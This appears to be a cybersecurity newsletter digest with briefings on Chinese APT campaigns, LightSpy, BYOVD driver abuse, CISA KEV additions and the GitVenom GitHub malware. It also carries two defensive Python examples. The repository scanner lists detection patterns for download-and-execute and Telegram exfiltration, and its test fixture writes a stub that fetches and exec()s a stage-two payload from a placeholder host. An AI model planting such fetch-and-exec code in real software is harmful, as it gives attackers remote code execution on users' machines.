Wednesday, Feb 26, 2025 // (IG): BB // GITHUB // SN R&D
China’s SpaceSail Accelerates Satellite Internet Race Against Starlink
Bottom Line Up Front (BLUF): China’s state-backed SpaceSail is rapidly expanding its low-Earth orbit (LEO) satellite internet network, positioning itself as a significant rival to Elon Musk’s Starlink. The company has launched operations in Brazil and Kazakhstan, with plans to deploy 648 satellites in 2025 and 15,000 by 2030 as part of the Qianfan constellation. China is investing heavily in LEO satellite technology, with state-backed companies and military-affiliated researchers developing tracking tools to monitor Starlink’s activities.
Analyst Comments: China’s push into LEO satellite communications signals a broader geopolitical strategy to reduce reliance on Western technology and expand digital influence through the Belt and Road Initiative. SpaceSail’s expansion into developing markets aligns with China’s goal of securing strategic orbital slots before regulations tighten. Meanwhile, military-backed research into Starlink’s capabilities suggests China views satellite internet as a national security concern, potentially paving the way for countermeasures against Western networks. As SpaceSail, Amazon’s Project Kuiper, and other players ramp up satellite deployments, the global competition for orbital dominance intensifies.
FROM THE MEDIA: SpaceSail, a Shanghai-based company controlled by the municipal government, is rapidly deploying LEO satellites to challenge Starlink’s global high-speed satellite internet dominance. The company has expanded into Brazil and Kazakhstan, with discussions ongoing in over 30 countries. Beijing has backed multiple LEO satellite initiatives, with a target of 43,000 satellites in the coming decades. Chinese researchers have also focused on cost-efficient satellite networks and tracking Starlink’s constellation, with military-affiliated institutions designing algorithms to monitor its activities. Western policymakers have raised concerns that China’s satellite expansion could be used to extend its internet censorship regime and expand geopolitical influence under the Belt and Road Initiative.
READ THE STORY: Cybernews
China-Backed Silver Fox APT Installs Backdoors in Healthcare Networks
Bottom Line Up Front (BLUF): A Chinese state-backed hacking group, Silver Fox APT, has been found exploiting medical imaging software to install backdoors, keyloggers, and cryptocurrency miners on patients' computers. Researchers at Forescout’s Vedere Labs discovered the campaign, which disguises malware as Philips DICOM medical software, enabling attackers to compromise hospital networks. The attack includes multiple evasion techniques, such as encrypted payloads stored in Alibaba Cloud and antivirus bypass mechanisms.
Analyst Comments: This campaign highlights the growing trend of targeting healthcare systems through indirect infection vectors, focusing on patients rather than hospital infrastructure. Silver Fox APT gains access to highly sensitive health data by spoofing trusted medical software while establishing persistent access to networks. The malware’s multi-stage execution, including PowerShell-based security evasion, shows high sophistication. Given Silver Fox’s history of expanding beyond Chinese-speaking targets, North American and European healthcare providers should prepare for increased espionage and financially motivated cyber threats.
FROM THE MEDIA: According to Forescout researchers, Silver Fox APT is distributing malware-laced versions of Philips DICOM imaging software, infecting patient devices and potentially infiltrating hospital networks. The attack begins with a first-stage malware dropper (MediaViewerLauncher.exe), which contacts a command-and-control (C2) server hosted on Alibaba Cloud to fetch encrypted payloads. The malware terminates security software using TrueSightKiller, then installs ValleyRAT, a remote access trojan (RAT) that enables full system control. The final payload includes a keylogger and a cryptocurrency miner, pointing to both espionage and financial motives. Silver Fox has recently expanded operations to English-speaking regions, with malware submissions from the US and Canada, suggesting an escalating threat to Western healthcare systems.
READ THE STORY: The Register // INFOSEC MAG
US and Ukraine Finalize Minerals Deal Amid Security Uncertainty
Bottom Line Up Front (BLUF): Ukraine has agreed to a minerals deal with the United States to strengthen its economic ties with the Trump administration. The agreement allows joint development of Ukraine’s mineral resources, including oil and gas, while the US has dropped an earlier demand for $500 billion in potential revenue. However, the final deal does not include security guarantees for Ukraine, a key point Kyiv had initially sought. President Volodymyr Zelensky is expected to travel to Washington, D.C., on Friday to formalize the deal with President Donald Trump.
Analyst Comments: This agreement marks a shift in US-Ukraine relations, moving from a purely military alliance toward an economic partnership. However, the omission of security guarantees raises concerns about Ukraine’s long-term strategic position, especially as the US has begun bilateral talks with Russia without Ukraine’s involvement. The deal could provide short-term economic benefits but may leave Ukraine vulnerable if military aid declines. The US stake in Ukraine’s mineral wealth could become contentious, particularly if future governments seek to renegotiate terms.
FROM THE MEDIA: Kyiv has agreed to jointly develop its mineral resources with the US, finalizing an agreement that had previously stalled over harsh financial demands from Washington. The revised deal requires Ukraine to contribute 50% of proceeds from the future monetization of state-owned mineral resources to a US-backed fund that will invest in projects within Ukraine. However, it excludes existing assets controlled by major Ukrainian energy firms like Naftogaz and Ukrnafta. While the agreement strengthens economic cooperation, it notably lacks security guarantees, which Ukraine had initially pushed for. Despite skepticism from opposition lawmakers in Kyiv, the deal has been approved by Ukraine’s justice, economy, and foreign ministers. The agreement's jurisdiction and final implementation details remain unresolved and will require further negotiations.
LightSpy Spyware Expands Capabilities, Infiltrates Windows, macOS, Linux, and Mobile Devices
Bottom Line Up Front (BLUF): Researchers have uncovered a major upgrade to the LightSpy spyware, which now supports over 100 commands and can extract data from social media apps like Facebook and Instagram. Initially documented in 2020, LightSpy has evolved into a cross-platform surveillance tool capable of infecting Windows, macOS, Linux, Android, iOS, and routers. The malware’s new features include enhanced operational control, keylogging, and expanded data collection.
Analyst Comments: LightSpy’s increasing modularity and cross-platform reach suggest it is being developed for long-term cyber-espionage campaigns. The ability to exfiltrate private social media messages and track user behavior raises concerns about state-sponsored surveillance and cybercrime operations. The malware’s new Windows-specific plugins also indicate an expansion into corporate and government targets, potentially compromising sensitive data. The removal of iOS-destructive plugins suggests attackers are prioritizing data collection over disruption. Organizations should implement robust endpoint security, network monitoring, and threat intelligence measures to detect and mitigate LightSpy infections.
FROM THE MEDIA: According to Hunt.io, LightSpy’s latest iteration shifts focus from direct data theft to broader operational control, with new commands managing transmission operations and plugin versions. The spyware now supports over 100 commands across Windows, macOS, Linux, Android, and iOS, allowing attackers to control infected devices remotely. LightSpy’s Windows-specific plugins enable keylogging, audio recording, and USB interaction, making it a powerful tool for long-term surveillance. Researchers also identified an admin panel endpoint that grants attackers remote control of infected mobile devices, further enhancing the spyware’s capabilities.
READ THE STORY: THN
China-Linked Hackers Breach US Republican Party’s Email System
Bottom Line Up Front (BLUF): Chinese hackers infiltrated the Republican National Committee’s (RNC) internal email system in July 2024, allegedly to gather intelligence on the party’s stance toward Taiwan, according to a Wall Street Journal report. Microsoft detected the breach and notified RNC officials, who opted not to inform the FBI due to concerns about media leaks. The extent of the compromise remains unclear, but it aligns with China’s long-standing practice of targeting US political campaigns to anticipate future policy shifts.
Analyst Comments: The timing of the breach—just before the RNC’s national convention—suggests an effort to shape China’s Taiwan strategy based on the Republican Party’s evolving stance. RNC officials’ decision to withhold disclosure from the FBI raises concerns about political sensitivities outweighing national security protocols. Given past cyberattacks on US elections, this breach underscores the persistent vulnerability of political organizations to foreign intelligence operations.
FROM THE MEDIA: According to an upcoming book by journalist Alex Isenstadt, Revenge: The Inside Story of Trump’s Return to Power, Chinese hackers infiltrated RNC email systems in mid-2024. The breach occurred while the Republican Party was revising its platform, removing previous references to a free-trade agreement with Taiwan. Microsoft alerted RNC leadership to the compromise, stating that attackers had access for months. However, RNC officials, including Trump campaign cochair Chris LaCivita, did not notify federal authorities, fearing media exposure. The Chinese embassy in Washington dismissed the allegations, stating that China opposes cyberattacks in all forms. Meanwhile, US cybersecurity officials warn that both Democratic and Republican campaigns have been frequent targets of Chinese espionage efforts for over a decade.
READ THE STORY: Taipei Times // The Register
2,500+ Truesight.sys Driver Variants Exploited to Bypass EDR and Deploy HiddenGh0st RAT
Bottom Line Up Front (BLUF): A large-scale malware campaign is exploiting vulnerabilities in the Truesight.sys driver (version 2.0.2) to bypass Endpoint Detection and Response (EDR) software and deploy HiddenGh0st RAT. Attackers have generated over 2,500 modified driver variants to evade detection, using the Bring Your Own Vulnerable Driver (BYOVD) technique. The majority of victims are located in China, Singapore, and Taiwan, with evidence suggesting links to the Silver Fox APT threat group.
Analyst Comments: This campaign underscores the ongoing weaponization of vulnerable drivers to disable security solutions before delivering advanced malware. By creating multiple hash variants of the driver while keeping its signature intact, attackers could bypass detection for months, evading Microsoft's Vulnerable Driver Blocklist and industry-standard security tools. The use of HiddenGh0st RAT, a well-documented remote access Trojan, suggests espionage and data theft as primary objectives. Although Microsoft has now updated its driver blocklist to mitigate this threat, similar BYOVD attacks will likely persist, emphasizing the need for proactive driver security policies.
FROM THE MEDIA: Researchers at Check Point discovered that attackers have been modifying and repackaging the vulnerable Truesight.sys driver to evade detection while deploying HiddenGh0st RAT. The campaign, active since June 2024, utilizes fake luxury product websites and fraudulent Telegram channels to distribute malware disguised as legitimate applications. Once executed, the malware downloads the Truesight.sys driver, which then terminates security software before launching a secondary payload. This next-stage malware mimics standard file formats (PNG, JPG, GIF) and eventually loads HiddenGh0st RAT, enabling attackers to steal data, conduct surveillance, and manipulate systems remotely. Microsoft addressed this vulnerability on December 17, 2024, by adding Truesight.sys to its driver blocklist, but attackers had already exploited the flaw for months before the update.
READ THE STORY: THN
Russian Officials Warn of Potential Cyberattack on LANIT, Major Tech Services Provider
Bottom Line Up Front (BLUF): Russia’s National Coordination Center for Computer Incidents (NCCCI) has publicly warned about a possible cybersecurity breach involving subsidiaries of LANIT, the country’s largest tech services provider. The incident likely affected LANIT’s payment processing and banking software subsidiaries, which supply software to financial institutions and ATM services. Authorities have advised businesses using LANIT’s software to change passwords and access keys as a precaution.
Analyst Comments: The fact that Russian authorities publicly acknowledged a cyberattack on a state-affiliated contractor is notable, as such incidents are rarely disclosed. LANIT, which provides IT services to Russia’s Ministry of Defense and defense industry, was sanctioned by the U.S. in 2024 due to its support for Russia’s war efforts. Given recent pro-Ukrainian cyber activity targeting Russian financial institutions, Ukraine-linked hackers may be responsible, though no attribution has been confirmed. If LANIT's infrastructure has been compromised, it could impact Russia’s financial and defense sectors, making this a potentially high-impact breach.
FROM THE MEDIA: The NCCCI’s warning comes after reports that subsidiaries of LANIT, a significant IT contractor for Russian state entities, may have suffered a cybersecurity breach. LANIT is involved in software development, system integration, and cybersecurity and has key contracts with Russia’s Ministry of Defense and the aerospace sector. While the specific details of the breach remain unclear, Russian authorities have urged LANIT customers to update credentials and review access permissions, especially for systems with remote access granted to LANIT engineers. This disclosure follows a series of cyberattacks targeting Russian financial institutions, many of which have been attributed to Ukraine-linked hacking groups. LANIT has not commented on the reported compromise, and the attackers’ identity remains unknown.
READ THE STORY: The Record // MSSP Alert
Chinese Cybersecurity Firm TopSec Leaks Data on Government Monitoring Operations
Bottom Line Up Front (BLUF): A data leak from Chinese cybersecurity firm TopSec has exposed its role in monitoring online content for government agencies, according to SentinelLabs. The leaked 7,000 lines of logs and code reveal how TopSec aids China’s state-owned enterprises and regulatory bodies in censorship and surveillance. The company specializes in Endpoint Detection & Response (EDR), vulnerability scanning, and cloud security and provides Tier 1 vulnerability intelligence to China’s intelligence agencies.
Analyst Comments: This leak sheds light on China’s deep integration of private cybersecurity firms into state surveillance. The exposure of TopSec’s operations confirms long-held concerns that Chinese firms play a direct role in internet censorship and digital espionage. The incident raises global cybersecurity concerns, as TopSec’s services may be embedded in networks beyond China. While the mechanism of the leak remains unclear, it underscores the risk of compromised sensitive government-linked data, potentially exposing China’s cyber operations to foreign intelligence. Organizations working with Chinese cybersecurity vendors should reassess data security risks and logging practices to prevent similar exposures.
FROM THE MEDIA: Researchers at SentinelLabs discovered a significant data leak from TopSec, a major Chinese cybersecurity firm. The leaked information includes scripts connecting to government, academic, and news websites, indicating the company’s role in China’s internet monitoring infrastructure. Among the agencies referenced are the Municipal Commissions for Discipline Inspection, which investigate corruption, and the Illegal and Harmful Information Reporting Center, responsible for censoring politically sensitive content. Established in 1995, TopSec has provided cloud monitoring services since 2004, expanding its reach across all Chinese administrative regions by 2020. The leak highlights the blurred lines between China’s public sector policies and private cybersecurity firms, raising global concerns about data security and digital governance.
READ THE STORY: SECBrief
CISA Adds Microsoft and Zimbra Flaws to KEV Catalog Amid Active Exploitation
Bottom Line Up Front (BLUF): The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two newly exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The flaws, impacting Microsoft Partner Center (CVE-2024-49035, CVSS 8.7) and Synacor Zimbra Collaboration Suite (CVE-2023-34192, CVSS 9.0), allow for privilege escalation and remote code execution, respectively. Federal agencies must patch these vulnerabilities by March 18, 2025, to comply with security directives.
Analyst Comments: While Microsoft has acknowledged in-the-wild exploitation of CVE-2024-49035, details on its abuse remain scarce. The Zimbra vulnerability (CVE-2023-34192), though patched in July 2023, is now being actively exploited, signaling that threat actors continue to leverage outdated vulnerabilities. Organizations relying on Microsoft Partner Center or Zimbra Collaboration Suite should immediately apply security updates to mitigate risks, especially given the increasing use of email and cloud collaboration services in cyberattacks.
FROM THE MEDIA: CISA has issued a security directive requiring Federal Civilian Executive Branch (FCEB) agencies to patch two actively exploited vulnerabilities affecting Microsoft Partner Center and Zimbra Collaboration Suite. CVE-2024-49035, a privilege escalation vulnerability, was patched in November 2024, but Microsoft has confirmed real-world exploitation. CVE-2023-34192, an XSS vulnerability in Zimbra, was fixed in July 2023, yet remains a target for cybercriminals. The move follows CISA’s recent addition of Adobe ColdFusion and Oracle Agile PLM vulnerabilities to its KEV catalog. Organizations using these products must prioritize patching to prevent potential data breaches and system compromises.
READ THE STORY: THN
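The KEV entry carries a due date, and the practical question for a defender is which deployed, still-unpatched systems fall under it and how many days remain. The script below is an added example, not CISA's tooling or anything from the story: it assumes the field names of the public KEV JSON feed (cveID, vendorProject, product, dueDate, knownRansomwareCampaignUse), embeds a constructed two-entry feed using the CVE IDs and the March 18, 2025 due date from the story, and checks it against a constructed asset inventory (the hostnames and the placeholder CVE-0000-0000 are made up for the example).

```python
"""Match an asset inventory against CISA KEV entries and flag patch deadlines."""
import json
from datetime import date, datetime

# Constructed sample in the shape of the CISA KEV JSON feed. Field names follow the
# public feed; the two entries use the CVE IDs and due date reported in the story.
KEV_SAMPLE = json.dumps({
    "vulnerabilities": [
        {"cveID": "CVE-2024-49035", "vendorProject": "Microsoft",
         "product": "Partner Center", "dueDate": "2025-03-18",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2023-34192", "vendorProject": "Synacor",
         "product": "Zimbra Collaboration Suite (ZCS)", "dueDate": "2025-03-18",
         "knownRansomwareCampaignUse": "Unknown"},
    ]
})

# Constructed asset inventory: deployed products and the CVEs still open on each host.
# CVE-0000-0000 is a placeholder that is deliberately absent from the KEV sample.
INVENTORY = [
    {"host": "mail-01.example.internal",
     "product": "Zimbra Collaboration Suite (ZCS)",
     "unpatched": ["CVE-2023-34192", "CVE-0000-0000"]},
    {"host": "portal-02.example.internal",
     "product": "Partner Center",
     "unpatched": ["CVE-2024-49035"]},
]


def load_kev(raw):
    """Index a KEV feed (JSON text) by CVE ID."""
    data = json.loads(raw)
    return {v["cveID"]: v for v in data["vulnerabilities"]}


def assess(inventory, kev, today):
    """Return one finding per (host, CVE) that is unpatched AND listed in KEV.

    Open CVEs that are not in KEV are ignored here: KEV is a prioritisation
    signal, not a complete vulnerability list. Findings are sorted so the
    most overdue item comes first.
    """
    findings = []
    for asset in inventory:
        for cve in asset["unpatched"]:
            entry = kev.get(cve)
            if entry is None:
                continue
            due = datetime.strptime(entry["dueDate"], "%Y-%m-%d").date()
            days_left = (due - today).days
            findings.append({
                "host": asset["host"],
                "cve": cve,
                "product": entry["product"],
                "due": entry["dueDate"],
                "days_left": days_left,
                "status": "OVERDUE" if days_left < 0 else "DUE",
                "ransomware_use": entry.get("knownRansomwareCampaignUse", "Unknown"),
            })
    findings.sort(key=lambda f: f["days_left"])
    return findings


if __name__ == "__main__":
    kev_index = load_kev(KEV_SAMPLE)
    for f in assess(INVENTORY, kev_index, date(2025, 2, 26)):
        print(f"{f['status']:8} {f['host']:28} {f['cve']} ({f['product']}) "
              f"due {f['due']}, {f['days_left']} days left")
```

In production the feed would be fetched from CISA's published JSON URL and the inventory from a CMDB or scanner export; the matching and deadline logic stays the same. Running it with today = Feb 26, 2025 shows both hosts with 20 days left; rerunning after March 18 flips them to OVERDUE.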
Items of interest
GitVenom Malware Hijacks Bitcoin Wallets Using Fake GitHub Projects
Bottom Line Up Front (BLUF): A sophisticated malware campaign dubbed GitVenom has been found infecting GitHub repositories to steal cryptocurrency and sensitive user data. Researchers at Kaspersky report that the campaign has been active for at least two years, using fake open-source projects to trick developers, gamers, and crypto investors. The malware has stolen approximately $456,600 (5 BTC), primarily targeting users in Russia, Brazil, and Turkey.
Analyst Comments: GitVenom highlights a growing trend where code-sharing platforms like GitHub are exploited to distribute malware, leveraging the trust developers place in open-source software. Clipper malware—which replaces copied wallet addresses to redirect funds—demonstrates a direct monetization strategy. Additionally, the inclusion of remote administration tools (RATs) such as AsyncRAT and QuasarRAT suggests an interest in long-term access to infected systems. Given GitHub’s vast ecosystem, similar threats will likely persist, necessitating strict code vetting before execution.
FROM THE MEDIA: Kaspersky uncovered over 200 malicious GitHub repositories masquerading as legitimate open-source projects, including Instagram automation tools, Telegram Bitcoin wallet managers, and Valorant game cheats. These repositories, designed to appear credible with thousands of commits and detailed README files, contain embedded malware that, when executed, downloads additional payloads from attacker-controlled GitHub repositories. The malware includes a Node.js-based information stealer that collects passwords, bank details, cryptocurrency wallets, and browsing history before exfiltrating the data via Telegram. Additionally, a clipper malware hijacks copied wallet addresses to redirect cryptocurrency transactions, while remote access trojans (RATs) like AsyncRAT and QuasarRAT enable attackers to maintain persistent control over infected systems. Security experts emphasize the need for rigorous code review before executing third-party software, as GitHub remains a prime target for cybercriminals.
READ THE STORY: THN // The Register
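Both the analyst comment and the Kaspersky summary end on the same recommendation: review third-party code before executing it. The scanner below is an added example written for this page; it is not Kaspersky's tooling and does not reproduce any indicator from the GitVenom report. The indicator patterns (download-then-execute chains, exec/eval over a decoded blob, long base64 runs, code pushed off-screen by hundreds of spaces, Telegram bot API URLs) are the author's own assumptions about what is worth a human look before running an unfamiliar repository, and the three-file sample tree it scans is constructed inline.

```python
"""Heuristic pre-execution triage of a source tree for download-and-run and
obfuscation patterns. A hit means 'read this file first', not 'malicious'."""
import re
import tempfile
from pathlib import Path

SCAN_SUFFIXES = {".py", ".js", ".ts", ".ps1", ".sh", ".bat", ".cmd"}
MAX_LINE_LEN = 2000  # hand-written source rarely has lines this long

# Indicator patterns: assumptions made for this example, not a published IoC list.
INDICATORS = {
    # something is fetched from the network and fed to an execution primitive
    "download_and_execute": re.compile(
        r"(urlopen|requests\.get|fetch\(|Invoke-WebRequest|curl |wget )"
        r".{0,200}"
        r"(exec\(|eval\(|subprocess|os\.system|Invoke-Expression|child_process)",
        re.S),
    # exec/eval applied directly to a decoded or decompressed blob
    "exec_on_decoded_blob": re.compile(
        r"(exec|eval)\s*\(\s*(base64\.b64decode|bytes\.fromhex|zlib\.decompress|Buffer\.from)"),
    # a long run of base64 alphabet, typical of an embedded second stage
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
    # code preceded by hundreds of spaces/tabs so it sits off-screen in an editor
    "whitespace_hidden_code": re.compile(r"[ \t]{500,}\S"),
    # Telegram bot API, a common exfiltration channel (named in the story)
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
}
STRONG = {"download_and_execute", "exec_on_decoded_blob", "whitespace_hidden_code"}


def scan_file(path):
    """Return the list of indicator names that fire on one file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if any(len(line) > MAX_LINE_LEN for line in text.splitlines()):
        hits.append("very_long_line")
    return hits


def scan_repo(root):
    """Map relative file path -> indicator hits, for script-like files under root."""
    root = Path(root)
    findings = {}
    for p in sorted(root.rglob("*")):
        if ".git" in p.parts or not p.is_file() or p.suffix.lower() not in SCAN_SUFFIXES:
            continue
        hits = scan_file(p)
        if hits:
            findings[p.relative_to(root).as_posix()] = hits
    return findings


def verdict(findings):
    """Collapse findings into a triage label for the whole tree."""
    if any(STRONG & set(hits) for hits in findings.values()):
        return "REVIEW BEFORE RUNNING"
    return "weak indicators" if findings else "no indicators"


def build_sample_repo(root):
    """Write a constructed sample tree: one ordinary script and two suspicious ones."""
    root = Path(root)
    (root / "cli.py").write_text(
        "import argparse\n\ndef main():\n    print('hello')\n", encoding="utf-8")
    (root / "setup_helper.py").write_text(
        "import base64\n"
        "payload = '" + "QUJD" * 80 + "'\n"      # 320-char base64-looking literal
        "exec(base64.b64decode(payload))\n", encoding="utf-8")
    (root / "utils").mkdir(exist_ok=True)
    (root / "utils" / "update.py").write_text(
        "import urllib.request\n"
        "def update():\n"
        "    data = urllib.request.urlopen('https://example.invalid/stage2').read()\n"
        "    exec(data)\n"
        + " " * 600 + "import os  # pushed off-screen by padding\n", encoding="utf-8")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        findings = scan_repo(build_sample_repo(tmp))
        for rel, hits in findings.items():
            print(f"{rel}: {', '.join(hits)}")
        print("verdict:", verdict(findings))
```

Point it at a freshly cloned repository instead of the sample tree and read every flagged file before running anything; a "weak indicators" result (for example a lone base64 literal) is common in legitimate code, which is why only the chained patterns decide the verdict.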
Hackers Use Github For Malware (Video)
FROM THE MEDIA: Cybercriminals abuse GitHub to distribute malware through fake open-source projects, targeting developers, gamers, and cryptocurrency investors. Security researchers at Kaspersky uncovered over 200 malicious repositories, which have been active for at least two years. The campaign, dubbed GitVenom, has facilitated the theft of approximately $456,600 in Bitcoin (5 BTC) by hijacking clipboard wallet addresses and stealing sensitive user data.
Github is Dangerous (Video)
FROM THE MEDIA: Imagine diving into GitHub, looking for cool projects to level up your coding skills—only to discover that hackers hide malware inside fake repositories. In this video, I’m exposing a sneaky cyber campaign where attackers weaponize GitHub’s trust to spread tools like AsyncRAT, clipper malware, and info stealers—right under everyone’s noses. Stay tuned to learn how they do it and how you can protect yourself from these hidden threats!
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.